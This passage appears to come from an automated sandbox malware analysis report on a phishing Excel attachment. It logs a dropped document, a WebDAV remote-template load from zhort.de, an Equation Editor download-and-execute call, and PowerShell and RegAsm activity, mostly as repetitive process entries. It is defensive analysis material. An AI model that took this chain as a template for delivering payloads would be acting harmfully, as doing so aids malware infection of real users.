                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 9_2_0032C53E push eax; ret 9_2_0032C53F
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 9_2_00330B02 push edx; ret 9_2_00330B03
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 9_2_00330700 push edx; ret 9_2_00330703
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 9_2_00330708 push edx; ret 9_2_0033070B
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 9_2_00326176 push eax; ret 9_2_00326177
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 9_2_0032616E push eax; ret 9_2_0032616F
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 9_2_003301B6 push eax; ret 9_2_003301B7
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 9_2_0032F9B8 push ecx; ret 9_2_0032F9BF
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 9_2_003301BE push eax; ret 9_2_003301BF
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 9_2_00331596 push ecx; ret 9_2_00331597
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 9_2_003269F7 push ecx; ret 9_2_00326A7B
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 9_2_0032F9F8 push eax; ret 9_2_0032F9FF
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 9_2_00328DD7 push edx; ret 9_2_00328E03
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 13_2_001F2925 pushfd ; iretd 13_2_001F2929
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 13_2_001F5924 push 3C00CD60h; iretd 13_2_001F592D
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 13_2_001F29F8 pushfd ; iretd 13_2_001F2A11

                Persistence and Installation Behavior

                barindex
                Microsoft Office launches external ms-search protocol handler (WebDAV)
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile opened: \Device\RdpDr\;:1\zhort.de@SSL\DavWWWRootJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile opened: \Device\RdpDr\;:1\zhort.de@SSL\DavWWWRootJump to behavior
                Office drops RTF file
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile dump: sweettastedbananabuttersmoothchcolcatebutterrichcontenttokeepsmoothbutterchocolatebuntogetmesweetgirl________yummybutterchocolatesmoothheret[1].doc.0.drJump to dropped file
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile dump: FFA95D3F.doc.4.drJump to dropped file
                Office viewer loads remote template
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXESection loaded: netapi32.dll and davhlpr.dll loadedJump to behavior
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 9_2_0033206F URLDownloadToFileW,ShellExecuteW,ExitProcess,9_2_0033206F
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 14_2_0041AA4A OpenSCManagerW,OpenServiceW,CloseServiceHandle,StartServiceW,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,14_2_0041AA4A
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 14_2_0041CB50 LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,14_2_0041CB50
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: RFQ No. 109078906v.xla.xlsxStream path 'Workbook' entropy: 7.99934649635 (max. 8.0)
                Source: 9EC30000.0.drStream path 'Workbook' entropy: 7.99925312434 (max. 8.0)
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

                Malware Analysis System Evasion

                barindex
                Delayed program exit found
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 14_2_0040F7A7 Sleep,ExitProcess,14_2_0040F7A7
